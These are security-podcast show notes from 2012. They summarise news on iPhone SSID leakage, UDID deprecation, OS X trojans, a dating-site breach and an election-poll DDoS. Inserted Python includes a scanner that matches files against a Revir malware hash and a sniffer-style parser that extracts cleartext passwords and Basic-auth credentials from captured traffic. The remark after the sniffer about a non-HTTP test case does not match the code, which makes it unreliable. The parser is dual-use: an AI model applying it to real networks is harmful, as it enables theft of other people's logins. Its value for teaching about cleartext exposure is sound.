Your daily source of Pwnage, Policy and Politics.

Episode 629 – Last Three SSID, UUID, OS X Malware, MilitarySingles, and Election DDoS

InfoSec Daily Podcast Episode 629 for March 26, 2012. Tonight's podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.

 

Announcements:

InfoSec Southwest

When: March 30-April 1, 2012

Where: Austin, Texas

http://www.Infosecsouthwest.com

 

Outerz0ne 8

When: April 20-21, 2012

Where: Wellesley Inn, Atlanta GA

http://www.outerz0ne.org

 

Linuxfest Northwest 2012

When: Saturday, April 28-29, 2012

Where: Bellingham Technical College – Bellingham, WA

http://www.linuxfestnorthwest.org/

 

AIDE 2012

When: May 21-25, 2012

Where: MU Forensic Science Center – Huntington, West Virginia

http://www.appyide.org/

 

LayerOne 2012

When: May 26-27, 2012

Where: Clarion Hotel – Anaheim, CA

http://www.layerone.org

 

Security 504: Hacker Techniques, Exploits & Incident Handling – Matt Romanek

When: June 20 – 27, 2012

Where: Courtyard Seattle Federal Way, WA


http://www.sans.org/mentor/details.php?nid=28014

 

Social Engineering Training

When: July 21-24, 2012

Where: Black Hat Vegas

When: August 20-24, 2012

Where: Bristol, UK

When: November 12-16, 2012

Where: Columbia, MD

http://www.social-engineer.com/social-engineer-training

 

Inside and Out of the Social-Engineer Toolkit (SET)

When: July 21 – 22, 2012

When: July 23 – 24, 2012

Where: Black Hat Vegas

http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

 

DerbyCon 2012 – The “Deuce” Reunion

When: September 27-30, 2012

Where: Louisville, KY

http://www.derbycon.com

 

Skydogcon

When: October 26-28, 2012

Where: Hotel Preston in Nashville, TN

http://www.skydogcon.com

 

Thanks to everyone that has purchased products from Amazon through the affiliate program.  If you’re not familiar with the affiliate program, simply go to and locate the Affiliate Program link on the right hand side.

 


 

Stories

Source:  http://www.novainfosecportal.com/2012/03/19/stalker-app-strikes-back-at-iphones-starbucks

Surprised there wasn’t more coverage on this story in the news on Friday… Basically, Mark Wuergler of Immunity Inc. found that the iPhone advertises the last three SSIDs it connected to, exposing the MAC addresses of those routers/access points as well. With this information anyone could then use a service like Google Location Services or Wireless Geographic Logging Engine to pinpoint exactly where a particular user has been. The same vulnerability is present on many of Apple’s other WiFi-enabled iOS devices as well. Here’s the relevant part of the ArsTechnica “Loose-lipped iPhones top the list of smartphones exploited by hacker” article I came across.

 

That’s because the iPhone is the only smartphone he knows of that transmits to anyone within range the unique identifiers of the past three wireless access points the user has logged into. He can then use off-the-shelf hardware to passively retrieve the routers’ MAC (media access control) addresses and look them up in databases such as Google Location Services and the Wireless Geographic Logging Engine. By allowing him to pinpoint the precise location of the wireless network, iPhones give him a quick leg-up when performing reconnaissance on prospective marks.

 

The article goes on to discuss an app Mark created called “Stalker” that automates collecting, parsing, and viewing not only this iPhone data but tons of other sensitive information from any open WiFi hotspot. Previously, slurping this network traffic could have been done by anyone just sniffing an open wireless network, but Stalker obviously “firesheeps” things to the next level.

 

Running on a laptop, Stalker vacuums up passwords, images, email and any other data that is sent unencrypted and organizes it in an easy-to-read interface.
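To make the “any other data that is sent unencrypted” point concrete, here is an added example (written for these show notes, not Immunity's Stalker code) of the simplest thing such a tool does: take raw frames off an open hotspot and pull cleartext HTTP logins out of them. It parses Ethernet/IPv4/TCP by hand, so it needs nothing beyond the Python standard library, and it recognises two common leak shapes: a login form POSTed over plain HTTP and an HTTP Basic `Authorization` header (which is base64, not encryption). The frames, IP addresses, host name and credentials are constructed for the demo; the field-name list is an assumption about what login forms usually call the password box.

```python
import base64
import struct
from urllib.parse import parse_qs

# Assumed field names that usually carry a password in a login form.
PASSWORD_FIELDS = ("pass", "pwd", "passwd", "password")


def build_frame(src_ip, dst_ip, payload, sport=51000, dport=80):
    """Wrap an HTTP payload in a minimal Ethernet/IPv4/TCP frame.

    Constructed test traffic: the MAC addresses are placeholders and the IP/TCP
    checksums are left at zero because the parser below does not verify them.
    """
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    ip = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + 20 + len(payload), 0, 0x4000, 64, 6, 0,
        bytes(int(o) for o in src_ip.split(".")),
        bytes(int(o) for o in dst_ip.split(".")),
    )
    # data offset 5 words, flags PSH|ACK, window, checksum, urgent pointer
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def extract_credentials(frame):
    """Return a list of cleartext-credential findings for one captured frame.

    Handles IPv4/TCP segments that begin with an HTTP request, which is what a
    passive sniffer on an open hotspot sees for most unencrypted logins.
    """
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        return []                                   # not IPv4
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:
        return []                                   # not TCP
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    tcp_start = 14 + ihl
    data_off = (frame[tcp_start + 12] >> 4) * 4
    payload = frame[tcp_start + data_off:]
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1", "replace").split(" ")
    if len(parts) < 3 or not parts[2].startswith("HTTP/"):
        return []                                   # not an HTTP request (e.g. TLS)
    method, path = parts[0], parts[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    host = headers.get("host", dst)
    findings = []

    # HTTP Basic auth is just base64: decoding it is not cracking.
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            findings.append({"kind": "basic-auth", "src": src, "host": host,
                             "path": path, "user": user, "password": password})
        except (ValueError, UnicodeDecodeError):
            pass

    # A login form POSTed over plain HTTP exposes every field verbatim.
    if method == "POST" and "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        fields = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
        if any(p in k.lower() for k in fields for p in PASSWORD_FIELDS):
            findings.append({"kind": "form", "src": src, "host": host,
                             "path": path, "fields": fields})
    return findings


# Constructed sample traffic from one client: a form login, a Basic-auth request,
# and an innocuous image fetch that should produce nothing.
SAMPLE_FRAMES = [
    build_frame("192.168.1.23", "203.0.113.10",
                b"POST /login HTTP/1.1\r\nHost: mail.example\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
                b"username=alice&password=hunter2"),
    build_frame("192.168.1.23", "203.0.113.10",
                b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\nAuthorization: Basic "
                + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"),
    build_frame("192.168.1.23", "203.0.113.10",
                b"GET /logo.png HTTP/1.1\r\nHost: mail.example\r\n\r\n"),
]


def sweep(frames=SAMPLE_FRAMES):
    """Run the extractor over a list of frames, as a sniffer loop would per packet."""
    return [finding for frame in frames for finding in extract_credentials(frame)]


if __name__ == "__main__":
    for finding in sweep():
        print(finding)
```

Everything this finds was handed to the network in the clear; the only defence on an open hotspot is to make sure the login goes over HTTPS (or a VPN) so the same parser sees nothing but a TLS handshake, which the last assertion-style case above demonstrates by returning nothing for a non-HTTP segment.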

Source: http://techcrunch.com/2012/03/24/apple-udids/

Amid extra scrutiny from Congress around privacy issues, Apple this week has started rejecting apps that access UDIDs, or identification numbers that are unique to every iPhone and iPad.

 

Apple had already given developers a heads-up about the change more than six months ago when it said in some iOS documentation that it was going to deprecate UDIDs. But it looks like Apple is moving ahead of schedule with pressure from lawmakers and the media. It can take more than a year to deprecate features because developers need time to adjust and change their apps. A few weeks ago, some of the bigger mobile-social developers told me that Apple had reached out and warned them to move away from UDIDs.

 

But this is the first time Apple has issued outright rejections for using UDIDs.

 

“Everyone’s scrambling to get something into place,” said Victor Rubba, chief executive of Fluik, a Canadian developer that makes games like Office Jerk and Plumber Crack. “We’re trying to be proactive and we’ve already moved to an alternative scheme.” Rubba said he isn’t sending any updates until he sees how the situation shakes out in the next few days.

 

For those unaware, the UDID is an alphanumeric string that is unique to each Apple device. It’s currently used by mobile ad networks, game networks, analytics providers, developers and app testing systems, like TestFlight, for example.

Playhaven, which helps developers monetize more than 1,200 games across iOS and Android, said several of its customers had been rejected in the last week. The company’s chief executive Andy Yang says that developers should try and stay as flexible as possible by supporting multiple ID systems until there’s a clear replacement.

Source: http://www.f-secure.com/weblog/archives/00002330.html

It's been a while since we last wrote about Mac malware, so I thought it would be good to give our readers an update on what's been happening during the last few months. Last year we detailed a possible Mac trojan in the making. At that time we were still speculating whether it would be part of a bundle or just a standalone binary. Now it's clear: a new variant was discovered and it is a full-blown application, complete with an icon.

The sample I analyzed uses thumbnail images/icons of Irina Shayk, apparently taken from the March 2012 issue of FHM (South Africa) magazine. The malicious application bundle is being spread inside an archive file together with other images taken from the magazine hoping that its file type will be overlooked by users.

Nothing else is new besides the implementation. The backdoor payload is still the same but uses a new C&C server. The server is currently active (at time of publication). It is important to take note that the new C&C server still points to the same IP address as the previous variant as mentioned by the folks at ESET. We have reported the server to CERT-FI. Hopefully they will be able to notify the proper authorities.

We detect this new variant as Trojan-Dropper:OSX/Revir.C, MD5: 7DBA3A178662E7FF904D12F260F0FFF3.
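The disguise F-Secure describes, an application bundle with an image thumbnail as its icon dropped into an archive of real images, is something you can check for yourself without a signature update. The following is an added example for these notes, not F-Secure's detection or any vendor code: it walks an extracted archive, flags any `.app` bundle that is sitting among image files, and hashes whatever is in the bundle's `Contents/MacOS` against an IOC set seeded with the MD5 published above. The `demo()` function builds a constructed folder layout (stand-in bytes, not a real sample) in a temp directory and adds that stand-in's own hash to the IOC set so the match path actually runs; the magazine folder name is made up.

```python
import hashlib
import os
import shutil
import tempfile

# MD5 published for Trojan-Dropper:OSX/Revir.C in the F-Secure post quoted above.
KNOWN_BAD_MD5 = {"7dba3a178662e7ff904d12f260f0fff3"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".tif", ".tiff"}


def md5_file(path):
    """Stream a file through MD5 and return the lowercase hex digest."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_extracted_archive(root, bad_md5s=KNOWN_BAD_MD5):
    """Walk an extracted archive and report suspicious items as (reason, path, md5).

    Two checks:
      * a .app bundle next to image files, the disguise described above
        (Finder shows the bundle's own icon, not its type);
      * any executable in a bundle's Contents/MacOS whose MD5 is in the IOC set.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        images_here = any(os.path.splitext(f)[1].lower() in IMAGE_EXTS for f in filenames)
        for name in list(dirnames):
            if not name.lower().endswith(".app"):
                continue
            dirnames.remove(name)            # inspect the bundle here, do not recurse into it
            bundle = os.path.join(dirpath, name)
            reason = "app bundle among images" if images_here else "app bundle"
            macos_dir = os.path.join(bundle, "Contents", "MacOS")
            executables = []
            if os.path.isdir(macos_dir):
                executables = [os.path.join(macos_dir, e) for e in sorted(os.listdir(macos_dir))
                               if os.path.isfile(os.path.join(macos_dir, e))]
            if not executables:
                findings.append((reason, bundle, None))
            for exe in executables:
                digest = md5_file(exe)
                hit = "known Revir sample" if digest in bad_md5s else reason
                findings.append((hit, exe, digest))
    return findings


def demo():
    """Build a constructed archive layout in a temp dir, scan it, and return the findings.

    The "magazine images" and the bundle executable are stand-in bytes, not real
    samples; the executable's own hash is added to the IOC set so the match path runs.
    """
    root = tempfile.mkdtemp(prefix="revir-demo-")
    try:
        album = os.path.join(root, "FHM_March_2012")          # constructed folder name
        macos_dir = os.path.join(album, "Irina.app", "Contents", "MacOS")
        os.makedirs(macos_dir)
        for i in range(1, 4):
            with open(os.path.join(album, "image%d.jpg" % i), "wb") as fh:
                fh.write(b"\xff\xd8\xff\xe0 constructed jpeg stand-in %d" % i)
        exe = os.path.join(macos_dir, "Irina")
        with open(exe, "wb") as fh:
            fh.write(b"\xcf\xfa\xed\xfe constructed mach-o stand-in")
        iocs = KNOWN_BAD_MD5 | {md5_file(exe)}
        return scan_extracted_archive(root, iocs)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for reason, path, digest in demo():
        print(reason, path, digest)
```

Point `scan_extracted_archive()` at a folder you have unpacked from an untrusted archive; a bundle that shows up among images is worth a look even when its hash does not match, since the post notes the dropper was repackaged with a new variant and only the payload and C&C stayed the same.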

Moving along — there's another more serious OS X malware threat lurking out there. The Flashback trojan, which first appeared around the same time as Revir, is still in the wild. It is using exploits to infect systems without user interaction. Though what it's exploiting are old Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353), we might begin seeing a real OS X outbreak if the gang upgrades their operation a notch higher and start targeting unpatched vulnerabilities.

Source: http://www.databreaches.net/?p=23736

MilitarySingles.com has apparently been hacked. The hack was announced on Twitter earlier today by Operation Digiturk and a database of 163,792 names, usernames, e-mail addresses, IP addresses, and passwords has been dumped on the Internet. The tweet was accompanied by the hashtags #anonymous #antisec #infosec

I don’t know if the site is aware of the hack and eSingles Inc.’s own web site does not seem to exist any more. I sent a courtesy notification to MilitarySingles.com to alert them to the hack with a request that they let this blog know what steps they will take to protect their users.

In any event, if you know a member of the military who uses or has used the site, do them a favor and suggest they change their password on any site where they may have reused it – including their mil.gov email account.

Source: http://www.theregister.co.uk/2012/03/26/hong_kong_vote_hack/

Two men have been arrested after an online referendum organised by Hong Kong university to poll citizens on their choice of chief executive was disabled in an apparent denial of service attack.

Broadcaster Radio Television Hong Kong (RTHK) reported that the men, aged 17 and 28, were arrested at the weekend after the online poll was disrupted for a large part of Friday and some of Saturday.

Hong Kong university’s Public Opinion Program set up the 'Civic Referendum Project' because people who live in the Special Administrative Region (SAR) of China are not given the power to vote directly for their CEO – effectively the head of the Hong Kong government.

Instead a pre-selected 1,200-strong Election Committee full of pro-Beijing businessmen is given the task, a fact that is angering a growing number of democracy-hungry locals, especially given that this year’s candidates were universally unpopular and tainted with scandal.

AFP reported that Hong Kong uni’s back-end systems buckled under the huge volume of traffic.